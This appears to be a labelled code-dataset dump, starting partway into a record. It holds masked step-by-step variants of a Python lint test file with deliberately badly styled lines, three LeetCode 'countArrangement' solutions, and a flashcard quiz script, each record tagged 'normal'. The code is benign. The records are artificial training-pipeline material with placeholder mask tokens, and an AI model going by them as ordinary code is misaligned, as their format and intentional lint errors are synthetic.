"step-1": "<mask token>\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\n<mask token>\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\n<mask token>\n\n\ndef b(a: int=1):\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\n<mask token>\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\n<mask token>\n\n\ndef munge(input: AnyStr, sep: AnyStr=None, limit=1000, extra: Union[str,\n dict]=None) ->AnyStr:\n pass\n\n\n<mask token>\n\n\ndef b(a: int=1):\n pass\n\n\n<mask token>\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-3": "<mask token>\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\n<mask token>\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\n<mask token>\n\n\ndef munge(input: AnyStr, sep: AnyStr=None, limit=1000, extra: Union[str,\n dict]=None) ->AnyStr:\n pass\n\n\n<mask token>\n\n\ndef b(a: int=1):\n pass\n\n\n<mask token>\n\n\ndef foo(*, asdf):\n pass\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-4": "<mask token>\nprint(1, 2)\n\n\ndef foo(x: int) ->int:\n return x + 1\n\n\nCONST: int = 42\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n<mask token>\n\n\ndef a():\n pass\n\n\nasync def b():\n pass\n\n\nasync def add(a: int=0, b: int=0) ->int:\n return a + b\n\n\nasync def add(a: int=0, b: int=0) ->int:\n return a + b\n\n\nasync def x():\n pass\n\n\nasync def x(y: int=1):\n pass\n\n\nasync def f(x):\n return 2\n\n\na[b1, :] == a[b1, ...]\n\n\ndef munge(input: AnyStr, sep: AnyStr=None, limit=1000, extra: Union[str,\n dict]=None) ->AnyStr:\n pass\n\n\ndef x(b: tuple=(1, 2)) ->int:\n return a + b\n\n\ndef b(a: int=1):\n pass\n\n\nif alpha[:-i]:\n *a, b = 1, 2, 3\n\n\ndef foo(*, asdf):\n pass\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-5": "#!/usr/bin/env python3\nfrom typing import ClassVar, List\n\nprint(1, 2)\n\n\n# Annotated function (Issue #29)\ndef foo(x: int) -> int:\n return x + 1\n\n\n# Annotated variables #575\nCONST: int = 42\n\n\nclass Class:\n cls_var: ClassVar[str]\n\n def m(self):\n xs: List[int] = []\n\n\n# True and False are keywords in Python 3 and therefore need a space.\n#: E275:13 E275:14\nnorman = True+False\n\n\n#: E302+3:0\ndef a():\n pass\n\nasync def b():\n pass\n\n\n# Okay\nasync def add(a: int = 0, b: int = 0) -> int:\n return a + b\n\n\n# Previously E251 four times\n#: E221:5\nasync def add(a: int = 0, b: int = 0) -> int:\n return a + b\n\n\n# Previously just E272+1:5 E272+4:5\n#: E302+3 E221:5 E221+3:5\nasync def x():\n pass\n\nasync def x(y: int = 1):\n pass\n\n\n#: E704:16\nasync def f(x): return 2\n\n\na[b1, :] == a[b1, ...]\n\n\n# Annotated Function Definitions\n# Okay\ndef munge(input: AnyStr, sep: AnyStr = None, limit=1000,\n extra: Union[str, dict] = None) -> AnyStr:\n pass\n\n\n#: E225:24 E225:26\ndef x(b: tuple = (1, 2))->int:\n return a + b\n\n\n#: E252:11 E252:12 E231:8\ndef b(a:int=1):\n pass\n\n\nif alpha[:-i]:\n *a, b = (1, 2, 3)\n\n\n# Named only arguments\ndef foo(*, asdf):\n pass\n\n\ndef foo2(bar, *, asdf=2):\n pass\n",
"step-ids": [
5,
7,
8,
10,
13
]
}
|
[
5,
7,
8,
10,
13
] |
from __future__ import annotations
from functools import cache
class Solution:
def countArrangement(self, n: int) -> int:
cache = {}
def helper(perm):
digits = len(perm)
if digits == 1:
return 1
if perm in cache:
return cache[perm]
cnt = 0
for i in range(digits):
if perm[i] % digits == 0 or digits % perm[i] == 0:
cnt += helper(perm[:i] + perm[i+1:])
cache[perm] = cnt
return cnt
return helper(tuple(range(1, n+1)))
class Solution:
def countArrangement(self, n: int) -> int:
# total number of bitset states possible
bitset_total = 2**n
dp = [[0 for _ in range(bitset_total)]
for _ in range(n+1)]
# all other valid states lead to this base case so mark this as 1
dp[0][0] = 1
# iterate over all positions
for i in range(1, n+1):
# iterate over all subsets
for bm in range(bitset_total):
# iterate over all numbers
for num in range(n):
# if number is not visited and satisfies condition in question
# & (各桁が両方とも1なら1になる)
# 1 << x (1を左にxシフトさせて右をゼロで埋める)
# ^ (XOR: 各桁の片方が1なら1になる)
if ((bm & (1 << num)) and
(((num+1) % i == 0) or
(i % (num+1) == 0))):
dp[i][bm] += dp[i-1][bm ^ (1 << num)]
return dp[-1][-1]
# bm is binary mask for visited numbers.
# i is current place we want to fill.
# Idea is to start from the end, and fill places in opposite direction,
# because for big numbers we potentially have less candidates.
# how dfs(bm, pl) will work:
# If we reached place 0 and procces was not interrupted so far,
# it means that we find beautiful arrangement.
# For each number 1, 2, ..., n we try to put this number on place pl:
# and we need to check two conditions: first, that this place is still empty,
# using bitmask and secondly that one of the two properties for beutiful arrangement
# holds. In this case we add dfs(bm^1<<i, pl - 1) to final answer.
# Finally, we run dfs(0, n): from the last place and with empty bit-mask.
class Solution:
def countArrangement(self, n: int) -> int:
@cache
def dfs(bm, i):
if i == 0:
return 1
cnt = 0
for num in range(n):
if not bm & 1 << num\
and ((num+1) % i == 0 or i % (num+1) == 0):
cnt += dfs(bm ^ 1 << num, i-1)
return cnt
return dfs(0, n)
# nums is the set of still available numbers.
# Note that my i goes downwards, from n to 1. Because position i = 1
# can hold any number, so I don't even have to check whether the last
# remaining number fits there. Also, position i = 2 happily holds
# every second number and i = 3 happily holds every third number,
# so filling the lowest positions last has a relatively high chance of success.
class Solution:
def countArrangement(self, n: int) -> int:
def count(i, nums):
if i == 1:
return 1
return sum(count(i-1, nums-{num})
for num in nums
if num % i == 0 or i % num == 0)
return count(n, set(range(1, n+1)))
|
normal
|
{
"blob_id": "e6acc7b022001d8419095ad6364a6ae9504ec7aa",
"index": 508,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-2": "<mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n bitset_total = 2 ** n\n dp = [[(0) for _ in range(bitset_total)] for _ in range(n + 1)]\n dp[0][0] = 1\n for i in range(1, n + 1):\n for bm in range(bitset_total):\n for num in range(n):\n if bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n dp[i][bm] += dp[i - 1][bm ^ 1 << num]\n return dp[-1][-1]\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-3": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n bitset_total = 2 ** n\n dp = [[(0) for _ in range(bitset_total)] for _ in range(n + 1)]\n dp[0][0] = 1\n for i in range(1, n + 1):\n for bm in range(bitset_total):\n for num in range(n):\n if bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n dp[i][bm] += dp[i - 1][bm ^ 1 << num]\n return dp[-1][-1]\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n cache = {}\n\n def helper(perm):\n digits = len(perm)\n if digits == 1:\n return 1\n if perm in cache:\n return cache[perm]\n cnt = 0\n for i in range(digits):\n if perm[i] % digits == 0 or digits % perm[i] == 0:\n cnt += helper(perm[:i] + perm[i + 1:])\n cache[perm] = cnt\n return cnt\n return helper(tuple(range(1, n + 1)))\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n bitset_total = 2 ** n\n dp = [[(0) for _ in range(bitset_total)] for _ in range(n + 1)]\n dp[0][0] = 1\n for i in range(1, n + 1):\n for bm in range(bitset_total):\n for num in range(n):\n if bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n dp[i][bm] += dp[i - 1][bm ^ 1 << num]\n return dp[-1][-1]\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n cnt = 0\n for num in range(n):\n if not bm & 1 << num and ((num + 1) % i == 0 or i % (num + \n 1) == 0):\n cnt += dfs(bm ^ 1 << num, i - 1)\n return cnt\n return dfs(0, n)\n\n\nclass Solution:\n\n def countArrangement(self, n: int) ->int:\n\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i - 1, nums - {num}) for num in nums if num %\n i == 0 or i % num == 0)\n return count(n, set(range(1, n + 1)))\n",
"step-5": "from __future__ import annotations\nfrom functools import cache\n\n\nclass Solution:\n def countArrangement(self, n: int) -> int:\n cache = {}\n\n def helper(perm):\n digits = len(perm)\n if digits == 1:\n return 1\n if perm in cache:\n return cache[perm]\n cnt = 0\n for i in range(digits):\n if perm[i] % digits == 0 or digits % perm[i] == 0:\n cnt += helper(perm[:i] + perm[i+1:])\n cache[perm] = cnt\n return cnt\n\n return helper(tuple(range(1, n+1)))\n\n\nclass Solution:\n def countArrangement(self, n: int) -> int:\n # total number of bitset states possible\n bitset_total = 2**n\n dp = [[0 for _ in range(bitset_total)]\n for _ in range(n+1)]\n # all other valid states lead to this base case so mark this as 1\n dp[0][0] = 1\n # iterate over all positions\n for i in range(1, n+1):\n # iterate over all subsets\n for bm in range(bitset_total):\n # iterate over all numbers\n for num in range(n):\n # if number is not visited and satisfies condition in question\n # & (各桁が両方とも1なら1になる)\n # 1 << x (1を左にxシフトさせて右をゼロで埋める)\n # ^ (XOR: 各桁の片方が1なら1になる)\n if ((bm & (1 << num)) and\n (((num+1) % i == 0) or\n (i % (num+1) == 0))):\n dp[i][bm] += dp[i-1][bm ^ (1 << num)]\n return dp[-1][-1]\n\n\n# bm is binary mask for visited numbers.\n# i is current place we want to fill. \n# Idea is to start from the end, and fill places in opposite direction,\n# because for big numbers we potentially have less candidates.\n# how dfs(bm, pl) will work:\n# If we reached place 0 and procces was not interrupted so far,\n# it means that we find beautiful arrangement.\n# For each number 1, 2, ..., n we try to put this number on place pl:\n# and we need to check two conditions: first, that this place is still empty,\n# using bitmask and secondly that one of the two properties for beutiful arrangement\n# holds. 
In this case we add dfs(bm^1<<i, pl - 1) to final answer.\n# Finally, we run dfs(0, n): from the last place and with empty bit-mask.\nclass Solution:\n def countArrangement(self, n: int) -> int:\n @cache\n def dfs(bm, i):\n if i == 0:\n return 1\n\n cnt = 0\n for num in range(n):\n if not bm & 1 << num\\\n and ((num+1) % i == 0 or i % (num+1) == 0):\n cnt += dfs(bm ^ 1 << num, i-1)\n return cnt\n\n return dfs(0, n)\n\n\n# nums is the set of still available numbers.\n# Note that my i goes downwards, from n to 1. Because position i = 1\n# can hold any number, so I don't even have to check whether the last\n# remaining number fits there. Also, position i = 2 happily holds\n# every second number and i = 3 happily holds every third number,\n# so filling the lowest positions last has a relatively high chance of success.\nclass Solution:\n def countArrangement(self, n: int) -> int:\n def count(i, nums):\n if i == 1:\n return 1\n return sum(count(i-1, nums-{num})\n for num in nums\n if num % i == 0 or i % num == 0)\n return count(n, set(range(1, n+1)))\n",
"step-ids": [
5,
6,
7,
8,
10
]
}
|
[
5,
6,
7,
8,
10
] |
import argparse
import pandas as pd
import random
import time
class Deck:
def __init__(self, num_cols, front, back):
self.flashcards = []
self.num_cols = num_cols
self.front = front
self.back = back
class Flashcard:
def __init__(self, deck, front, back, column, row):
self.deck = deck
self.front = front
self.back = back
self.column = column
self.row = row
self.correct = False
def show_front(self):
r = "{}: {}".format(self.deck.front, self.front)
return r
def show_back(self):
return "{}: {}".format(self.deck.back, self.back)
def show_card(self):
return "{}: {}, {}: {}".format(self.deck.front, self.front, self.deck.back, self.back)
def show_reverse(self):
return "{}: {}, {}: {}".format(self.deck.back, self.back, self.deck.front, self.front)
def create_deck(filename, num_cols):
df = pd.read_excel(filename)
front = df.columns.values[0]
back = df.columns.values[1]
deck = Deck(num_cols, front, back)
for i in range(num_cols):
front_column = "{}.{}".format(front, i) if i else front
back_column = "{}.{}".format(back, i) if i else back
for row in range(df[front_column].size):
f = df[front_column][row]
b = df[back_column][row]
if not (pd.isnull(f) or pd.isnull(b)):
fc = Flashcard(deck, f.strip(), b.strip(), i, row)
deck.flashcards.append(fc)
return deck
def get_cards_from_deck(deck, first_letter, start_index, number_of_cards):
flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or first_letter == -1]
return flashcards[start_index:number_of_cards+start_index]
def play_game(deck, mode, first_letter, start_index, number_of_cards):
flashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)
play_cards(mode, deck, flashcards)
def play_cards(mode, deck, cards):
    """Quiz the user on *cards* and report a score.

    mode % 2 picks the quiz direction (0: front->back, 1: back->front);
    mode >= 2 additionally shuffles the cards in place.  Incorrectly
    answered cards can be replayed recursively; timing is shown only
    when a round finishes with no mistakes.
    """
    source = deck.front if mode%2 == 0 else deck.back
    target = deck.back if mode%2 == 0 else deck.front
    if mode >= 2:
        # NOTE(review): shuffles the caller's list in place.
        random.shuffle(cards)
    num_cards = len(cards)
    start_time = time.time()
    for i, fc in enumerate(cards):
        source_word = fc.front if mode%2==0 else fc.back
        target_word = fc.back if mode%2==0 else fc.front
        quiz(fc, source, source_word, target, target_word, i, num_cards)
    print("All Done!")
    correct = sum(fc.correct == True for fc in cards)
    incorrect = len(cards) - correct
    print("Correct: {}".format(correct))
    print("Incorrect: {}".format(incorrect))
    if (incorrect):
        incorrect_cards = [fc for fc in cards if not fc.correct]
        print("\n".join([fc.show_card() for fc in incorrect_cards]))
        again = input("review incorrect words (y/n): ")
        # 'да' is Russian for "yes" (the app quizzes Russian vocab).
        if again == 'y' or again == '1' or again == 'да':
            play_cards(mode, deck, incorrect_cards)
    else:
        # Timing is only reported for a mistake-free round.
        finish_time = time.time()
        time_diff = time.gmtime(finish_time - start_time)
        avg_time = time.gmtime((finish_time - start_time) / num_cards)
        print("Total Time: {}".format(time.strftime("%H:%M:%S", time_diff)))
        print("Time per card: {}".format(time.strftime("%H:%M:%S", avg_time)))
def quiz(fc, source_language, source_word, target_language, target_word, i, number_of_cards):
        """Ask the user to translate *source_word*; mark *fc* correct on success.

        On a wrong answer the right translation is shown and the user is
        prompted to retype it once; that retyped answer is not re-checked.
        """
        print("Card {}/{}".format(i+1, number_of_cards))
        print("{} word: {}".format(source_language, source_word))
        answer = input("Enter {} translation: ".format(target_language))
        if is_correct(answer, target_word):
            fc.correct = True
            print("Correct!")
        else:
            print("Incorrect! Correct answer was: {}".format(target_word))
            # NOTE(review): the retyped answer is deliberately ignored; `n` is unused.
            n = input("Enter {} translation for {}: ".format(target_language, source_word))
def is_correct(answer, target):
    """True when *answer* matches *target* after normalization
    (case, surrounding whitespace and meaning order are ignored)."""
    normalized_answer = format_for_comparison(answer)
    normalized_target = format_for_comparison(target)
    return normalized_answer == normalized_target
def format_for_comparison(word):
    """Normalize a vocab entry so order-insensitive comparison works.

    Lowercases and strips the entry, then sorts the comma-separated
    meanings that appear before the first '(' (the parenthesised
    declension part, if any, is left untouched).
    """
    normalized = word.strip().lower()
    # Everything before the first '(' is the meanings list.
    head, sep, tail = normalized.partition('(')
    meanings = sorted(head.split(', '))
    return ', '.join(meanings) + sep + tail
def learn_words(deck, first_letter, start_index, number_of_cards):
    """Typing-practice mode: show each card and let the user copy it.

    Each card is presented three times (both sides, front only, back
    only); the typed input is practice only and is never checked.
    Ends with a read-through of everything practiced.
    """
    flashcards = get_cards_from_deck(deck, first_letter, start_index, number_of_cards)
    for i, card in enumerate(flashcards):
        print("Card {}/{}".format(i+1, number_of_cards))
        input("{}\nPractice: ".format(card.show_card()))
        input("{}\nPractice: ".format(card.show_front()))
        input("{}\nPractice: ".format(card.show_back()))
    print("Done! Review learned words:")
    for card in flashcards:
        print("{}".format(card.show_card()))
def main(filename, first_letter, start_index, number_of_cards, mode):
    """Entry point: build the deck and dispatch on *mode*.

    Modes 0-3 are quiz variants handled by play_game(); mode 4 is the
    side-by-side typing-practice mode handled by learn_words().
    """
    deck = create_deck(filename, 9)  # the spreadsheet holds 9 column pairs
    print("Welcome to The Flashcard Learner!")
    print("Okay! Let's play!")
    if mode == 4:
        learn_words(deck, first_letter, start_index, number_of_cards)
    else:
        play_game(deck, mode, first_letter, start_index, number_of_cards)
if __name__ == "__main__":
    # CLI: filename category start num mode (see main() for mode meanings).
    parser = argparse.ArgumentParser(description="Learn flashcards")
    # NOTE(review): `default` on a positional argument has no effect
    # unless nargs='?' is also given — confirm intended behavior.
    parser.add_argument("filename", help="name of .xlsx file with vocab", default="RussianVocab.xlsx")
    parser.add_argument("category", type=int, help="e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)")
    parser.add_argument("start", type=int, help="start index (lists are 0-indexed)")
    parser.add_argument("num", type=int, help="number of cards you'd like to see")
    parser.add_argument("mode", type=int)
    args = parser.parse_args()
    main(args.filename, args.category, args.start, args.num, args.mode)
|
normal
|
{
"blob_id": "d5903698eb8ed6be531b0cc522d4feff6b79da4e",
"index": 954,
"step-1": "<mask token>\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\ndef create_deck(filename, num_cols):\n df = pd.read_excel(filename)\n front = df.columns.values[0]\n back = df.columns.values[1]\n deck = Deck(num_cols, front, back)\n for i in range(num_cols):\n front_column = '{}.{}'.format(front, i) if i else front\n back_column = '{}.{}'.format(back, i) if i else back\n for row in range(df[front_column].size):\n f = df[front_column][row]\n b = df[back_column][row]\n if not (pd.isnull(f) or pd.isnull(b)):\n fc = Flashcard(deck, f.strip(), b.strip(), i, row)\n deck.flashcards.append(fc)\n return deck\n\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or\n first_letter == -1]\n return flashcards[start_index:number_of_cards + start_index]\n\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n play_cards(mode, deck, flashcards)\n\n\ndef play_cards(mode, deck, cards):\n source = deck.front if mode % 2 == 0 else deck.back\n target = deck.back if mode % 2 == 0 else deck.front\n if mode >= 2:\n random.shuffle(cards)\n num_cards = len(cards)\n start_time = 
time.time()\n for i, fc in enumerate(cards):\n source_word = fc.front if mode % 2 == 0 else fc.back\n target_word = fc.back if mode % 2 == 0 else fc.front\n quiz(fc, source, source_word, target, target_word, i, num_cards)\n print('All Done!')\n correct = sum(fc.correct == True for fc in cards)\n incorrect = len(cards) - correct\n print('Correct: {}'.format(correct))\n print('Incorrect: {}'.format(incorrect))\n if incorrect:\n incorrect_cards = [fc for fc in cards if not fc.correct]\n print('\\n'.join([fc.show_card() for fc in incorrect_cards]))\n again = input('review incorrect words (y/n): ')\n if again == 'y' or again == '1' or again == 'да':\n play_cards(mode, deck, incorrect_cards)\n else:\n finish_time = time.time()\n time_diff = time.gmtime(finish_time - start_time)\n avg_time = time.gmtime((finish_time - start_time) / num_cards)\n print('Total Time: {}'.format(time.strftime('%H:%M:%S', time_diff)))\n print('Time per card: {}'.format(time.strftime('%H:%M:%S', avg_time)))\n\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i,\n number_of_cards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n print('{} word: {}'.format(source_language, source_word))\n answer = input('Enter {} translation: '.format(target_language))\n if is_correct(answer, target_word):\n fc.correct = True\n print('Correct!')\n else:\n print('Incorrect! 
Correct answer was: {}'.format(target_word))\n n = input('Enter {} translation for {}: '.format(target_language,\n source_word))\n\n\ndef is_correct(answer, target):\n return format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n word = word.strip().lower()\n word = word.split('(')\n word[0] = word[0].split(', ')\n word[0].sort()\n word[0] = ', '.join(word[0])\n word = '('.join(word)\n return word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n for i, card in enumerate(flashcards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n input('{}\\nPractice: '.format(card.show_card()))\n input('{}\\nPractice: '.format(card.show_front()))\n input('{}\\nPractice: '.format(card.show_back()))\n print('Done! Review learned words:')\n for card in flashcards:\n print('{}'.format(card.show_card()))\n\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n num_cols = 9\n deck = create_deck(filename, num_cols)\n print('Welcome to The Flashcard Learner!')\n print(\"Okay! Let's play!\")\n if mode == 4:\n learn_words(deck, first_letter, start_index, number_of_cards)\n else:\n play_game(deck, mode, first_letter, start_index, number_of_cards)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\ndef create_deck(filename, num_cols):\n df = pd.read_excel(filename)\n front = df.columns.values[0]\n back = df.columns.values[1]\n deck = Deck(num_cols, front, back)\n for i in range(num_cols):\n front_column = '{}.{}'.format(front, i) if i else front\n back_column = '{}.{}'.format(back, i) if i else back\n for row in range(df[front_column].size):\n f = df[front_column][row]\n b = df[back_column][row]\n if not (pd.isnull(f) or pd.isnull(b)):\n fc = Flashcard(deck, f.strip(), b.strip(), i, row)\n deck.flashcards.append(fc)\n return deck\n\n\ndef get_cards_from_deck(deck, first_letter, start_index, number_of_cards):\n flashcards = [fc for fc in deck.flashcards if fc.column == first_letter or\n first_letter == -1]\n return flashcards[start_index:number_of_cards + start_index]\n\n\ndef play_game(deck, mode, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n play_cards(mode, deck, flashcards)\n\n\ndef play_cards(mode, deck, cards):\n source = deck.front if mode % 2 == 0 else deck.back\n target = deck.back if mode % 2 == 0 else deck.front\n if mode >= 2:\n random.shuffle(cards)\n num_cards = len(cards)\n start_time = 
time.time()\n for i, fc in enumerate(cards):\n source_word = fc.front if mode % 2 == 0 else fc.back\n target_word = fc.back if mode % 2 == 0 else fc.front\n quiz(fc, source, source_word, target, target_word, i, num_cards)\n print('All Done!')\n correct = sum(fc.correct == True for fc in cards)\n incorrect = len(cards) - correct\n print('Correct: {}'.format(correct))\n print('Incorrect: {}'.format(incorrect))\n if incorrect:\n incorrect_cards = [fc for fc in cards if not fc.correct]\n print('\\n'.join([fc.show_card() for fc in incorrect_cards]))\n again = input('review incorrect words (y/n): ')\n if again == 'y' or again == '1' or again == 'да':\n play_cards(mode, deck, incorrect_cards)\n else:\n finish_time = time.time()\n time_diff = time.gmtime(finish_time - start_time)\n avg_time = time.gmtime((finish_time - start_time) / num_cards)\n print('Total Time: {}'.format(time.strftime('%H:%M:%S', time_diff)))\n print('Time per card: {}'.format(time.strftime('%H:%M:%S', avg_time)))\n\n\ndef quiz(fc, source_language, source_word, target_language, target_word, i,\n number_of_cards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n print('{} word: {}'.format(source_language, source_word))\n answer = input('Enter {} translation: '.format(target_language))\n if is_correct(answer, target_word):\n fc.correct = True\n print('Correct!')\n else:\n print('Incorrect! 
Correct answer was: {}'.format(target_word))\n n = input('Enter {} translation for {}: '.format(target_language,\n source_word))\n\n\ndef is_correct(answer, target):\n return format_for_comparison(answer) == format_for_comparison(target)\n\n\ndef format_for_comparison(word):\n word = word.strip().lower()\n word = word.split('(')\n word[0] = word[0].split(', ')\n word[0].sort()\n word[0] = ', '.join(word[0])\n word = '('.join(word)\n return word\n\n\ndef learn_words(deck, first_letter, start_index, number_of_cards):\n flashcards = get_cards_from_deck(deck, first_letter, start_index,\n number_of_cards)\n for i, card in enumerate(flashcards):\n print('Card {}/{}'.format(i + 1, number_of_cards))\n input('{}\\nPractice: '.format(card.show_card()))\n input('{}\\nPractice: '.format(card.show_front()))\n input('{}\\nPractice: '.format(card.show_back()))\n print('Done! Review learned words:')\n for card in flashcards:\n print('{}'.format(card.show_card()))\n\n\ndef main(filename, first_letter, start_index, number_of_cards, mode):\n num_cols = 9\n deck = create_deck(filename, num_cols)\n print('Welcome to The Flashcard Learner!')\n print(\"Okay! Let's play!\")\n if mode == 4:\n learn_words(deck, first_letter, start_index, number_of_cards)\n else:\n play_game(deck, mode, first_letter, start_index, number_of_cards)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Learn flashcards')\n parser.add_argument('filename', help='name of .xlsx file with vocab',\n default='RussianVocab.xlsx')\n parser.add_argument('category', type=int, help=\n 'e.g. which letter are you learning? (-1: all, 0:a, 1:б, 2:в, etc.)')\n parser.add_argument('start', type=int, help=\n 'start index (lists are 0-indexed)')\n parser.add_argument('num', type=int, help=\n \"number of cards you'd like to see\")\n parser.add_argument('mode', type=int)\n args = parser.parse_args()\n main(args.filename, args.category, args.start, args.num, args.mode)\n",
"step-4": "import argparse\nimport pandas as pd\nimport random\nimport time\n\n\nclass Deck:\n\n def __init__(self, num_cols, front, back):\n self.flashcards = []\n self.num_cols = num_cols\n self.front = front\n self.back = back\n\n\nclass Flashcard:\n\n def __init__(self, deck, front, back, column, row):\n self.deck = deck\n self.front = front\n self.back = back\n self.column = column\n self.row = row\n self.correct = False\n\n def show_front(self):\n r = '{}: {}'.format(self.deck.front, self.front)\n return r\n\n def show_back(self):\n return '{}: {}'.format(self.deck.back, self.back)\n\n def show_card(self):\n return '{}: {}, {}: {}'.format(self.deck.front, self.front, self.\n deck.back, self.back)\n\n def show_reverse(self):\n return '{}: {}, {}: {}'.format(self.deck.back, self.back, self.deck\n .front, self.front)\n\n\ndef create_deck(filename, num_cols):\n df = pd.read_excel(filename)\n front = df.columns.values[0]\n back = df.columns.values[1]\n deck = Deck(num_cols, front, back)\n for i in range(num_cols):\n front_column = '{}.{}'.format(front, i) if i else front\n back_column = '{}.{}'.format(back, i) if i else back\n for row in range(df[front_column].size):\n f = df[front_column][row]\n b = df[back_column][row]\n if not (pd.isnull(f) or pd.isnull(b)):\n fc = Flashcard(deck, f.strip(), b.strip(), i, row)\n 